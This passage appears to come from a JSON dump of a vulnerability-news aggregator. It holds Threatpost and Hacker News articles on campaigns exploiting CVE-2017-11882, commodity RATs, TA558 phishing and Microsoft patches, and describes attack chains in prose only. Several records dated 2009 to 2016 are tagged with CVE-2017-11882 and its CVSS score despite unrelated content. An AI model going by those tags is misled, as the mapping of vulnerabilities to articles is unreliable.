If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows and AndroidRAT. They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. 
\n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017. However, as recently [as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>), attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. 
\n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. 
It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 which is the final payload in the reconnaissance phase \u2013 contains the file enumerator, which lists specific file types on the endpoint and sends the file paths to the command-and-control (C2) server along with file infector modules, which are different than typical executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. 
\n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": "\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. 
The vulnerability was initially highlighted in [Oracle\u2019s Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).\n\nIn a [post on its Technet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of the Trustworthy Computing claimed Microsoft isn\u2019t aware of any active exploits against the vulnerability but insisted following the workaround would be the best practice for users until an adequate security update was developed.\n\n[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft\u2019s Security and Defense team explains the best way to minimize risk is disabling WebReady Document Viewing on the VDir of all CAS servers. This will circumvent a problem that lies in the way WebReady Document Viewing renders certain attachments as a web page \u201cinstead of relying on local applications to open/view it,\u201d according to the post.\n\nFor more on this, including a more in depth explanation of the Oracle flaw, head to [Technet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).\n", "cvss3": {}, "published": "2012-07-26T16:34:25", "type": "threatpost", "title": "Microsoft Publishes Workaround for Oracle Outside In Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:105BBC66E564BD98581E52653F5EA865", "href": "https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a 
pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data available on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. 
The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. 
That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. 
Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the 
file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yandex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home page will be changed.\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains for the new start pages, as well as the domains hosting the malicious Flash update, were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. 
If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:45", "description": "[](<https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/>)Microsoft released nine security updates Tuesday, four critical; five important, fixing 21 different holes in various applications with its February patch release. The four critical fixes deal with vulnerabilities in the company\u2019s Windows, Internet Explorer, .NET Framework and Silverlight programs that could allow remote code execution if left unpatched.\n\nMicrosoft considers MS12-010 and MS120-013 as the update\u2019s top priority bulletins.\n\nMS12-010 addresses four issues in Internet Explorer, two critical, one important and one moderate. The two critical issues could allow an attacker the same rights as a logged-on user while the other two could allow an attacker to view content remotely or via the browser\u2019s processed memory.\n\nIn MS12-010, if a user were to open a specially crafted media file in Windows, it could lead to a buffer overflow in the C++ Run-Time Library. 
Alexander Gavrun, working with TippingPoint\u2019s Zero Day Initiative, disclosed an issue with the vulnerability, yet Microsoft claims it isn\u2019t actively being exploited in the wild.\n\nSome of the other fixes involve a flaw (MS12-015) in the less-used Visio Viewer where an attacker could gain access if a specially crafted Visio file was opened. A vulnerability (MS12-014) in Indeo Codec could allow an attacker to run arbitrary code as the logged on user if an .AVI file was opened in the same directory as a .DLL file. Similarly, in Windows\u2019 Color Control Panel, if a user opened an .ICM or .ICC file in the same directory as a .DLL file, an attacker could gain control of their computer (MS12-012).\n\nTwo of the vulnerabilities marked \u2018Important\u2019 by Microsoft deal with flaws in Windows\u2019 Ancillary Function Driver (MS12-009) and Microsoft Office and Server\u2019s Sharepoint (MS12-011). Both of these vulnerabilities could allow elevation of privilege, according to the company, if an attacker ran a malicious application for MS12-009 or encountered an XSS vulnerability in Sharepoint (MS12-011).\n\nThe monthly update is Microsoft\u2019s last batch of updates before this year\u2019s Pwn2Own competition, an annual hacking contest held the first week of March at Vancouver\u2019s [CanSecWest Conference](<http://cansecwest.com/>). 
Each year entrants attempt to hack browsers like Microsoft\u2019s Internet Explorer and Mozilla\u2019s Firefox in the challenge run by TippingPoint.\n\nIt was around this time last year that [Stephen Fewer](<https://threatpost.com/pwn2own-winner-stephen-fewer-031011/>), now with Harmony Security, [bypassed Internet Explorer 8](<https://threatpost.com/apple-safari-and-internet-explorer-8-go-down-pwn2own-iphone-next-031011/>)\u2019s DEP and ASLR to execute a successful exploit in the browser on Windows 7.\n", "cvss3": {}, "published": "2012-02-14T20:17:07", "type": "threatpost", "title": "Microsoft Fixes Critical IE, Windows Bugs with February Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:48", "id": "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "href": "https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/76213/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. 
\n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy settings for the next version of their search engine. Currently the site strips SSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling an unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>) allows attackers to capture site cookies from users on unsecured wireless networks and browse under their logon.\n\nWith the advent of Firesheep and, subsequently, its surge of recently converted hackers, HTTP session hijacking is becoming more and more of a concern. Sites like Bing will have to adopt suitable security techniques to contend with the extension\u2019s further proliferation.\n\nFirefox 4, scheduled for release by the end of the year, will help. [As reported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport Security, ensuring the browser always requests a safe HTTPS session from sites. 
However, if sites like Bing don\u2019t implement SSL on their sites, the lack of end-to-end encryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network World has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-08-19T15:49:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhSF3-bdUgcyooEnkVmoAuf9mByPWvpo0qQ1Nswd04Ez2-TI9Sv6jdTYYCIvoW-JgAcS9U5-6hRItccG5cIe4cNT59zP19J6eXEa8XLxLq2Mxzbr0X0GNNQSlaM_z9ByEZwafQ_1WNvWNpu3YI3IOsvoVN43tgy4LsKHBUIEwW_yzpxOpIm_u-Jepe0/s728-e100/cyber-attack.jpg>)\n\nA financially motivated cybercrime group has been linked to an ongoing wave of attacks aimed at hospitality, hotel, and travel organizations in Latin America with the goal of installing malware on compromised systems.\n\nEnterprise security firm Proofpoint, which is tracking the group under the name TA558 dating all the way back to April 2018, called it a \"small crime threat actor.\"\n\n\"Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT,\" the company's threat research team [said](<https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel>) in a new report.\n\nThe group has been operational at a higher tempo in 2022 than usual, with intrusions mainly geared towards Portuguese and 
Spanish speakers in Latin America, and to a lesser extent in Western Europe and North America.\n\nPhishing campaigns mounted by the group involve sending malicious spam messages with reservation-themed lures such as hotel bookings that contain weaponized documents or URLs in a bid to entice unwitting users into installing trojans capable of reconnaissance, data theft, and distribution of follow-on payloads.\n\nThe attacks have subtly evolved over the years: The ones spotted between 2018 and 2021 leveraged emails with Word documents that either contained VBA macros or exploits for flaws such as [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>) and [CVE-2017-8570](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8570>) to download and install a mixture of malware such as AsyncRAT, Loda RAT, Revenge RAT, and Vjw0rm.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhf1-OFftMoPWFY8SQxjqyMzuueO4DWvvdsai8hxrPVmfzLMcf7AlZqOX_TT28YvoALA2Gtn8NkaajNSmEud9v1jPjPTL2y19wBJHE2OaleO43dmqwwQQ1CcFVJZok0_N0qZUaW8yQGsVBlD2lzCIbh_WggVEozhtWY_7tymfhzVdZiXVGw9-oTXJhu/s728-e100/HACKING.jpg>)\n\nIn recent months, however, TA558 has been observed pivoting away from macro-laden Microsoft Office attachments in favor of URLs and ISO files to achieve initial infection, a move likely in response to [Microsoft's decision to block macros](<https://thehackernews.com/2022/07/hackers-opting-new-attack-methods-after.html>) in files downloaded from the web by default.\n\nOf the 51 campaigns carried out by the group so far this year, 27 of them are said to have incorporated URLs pointing to ISO files and ZIP archives, in comparison to just five campaigns altogether from 2018 through 2021.\n\nProofpoint further noted that the intrusions chronicled under TA558 are part of a [broader](<https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/>) 
[set](<https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html>) of [malicious](<https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html>) [activities](<https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america>) focusing on [victims](<https://thehackernews.com/2022/07/microsoft-resumes-blocking-office-vba.html>) in the Latin American region. But in the absence of any post-compromise activity, it's suspected that TA558 is a financially motivated cybercriminal actor.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjmvMaze6hyM5Ls6kCSqVK-L1d5Fra21pXBpsSElqp2NnDj6RCspcHXHflufjOJ-DvrZ_JEDFJRYirOg6MxMwW4hVwDrPxDxDxxItOHhvSP5wqEXF38GjwUvdNMrvvAe0vb2fk1Ulz9mv331uYTi5xon2Zr90oR0ltWXQqL0q-GVyHn-pe1LxSQHmjb/s728-e100/hacking-data.jpg>)\n\n\"The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads,\" the researchers said. \"Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.\"\n", 
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-19T13:35:00", "type": "thn", "title": "Cybercrime Group TA558 Targeting Hospitality, Hotel, and Travel Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2022-08-19T13:35:28", "id": "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "href": "https://thehackernews.com/2022/08/cybercrime-group-ta558-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval 
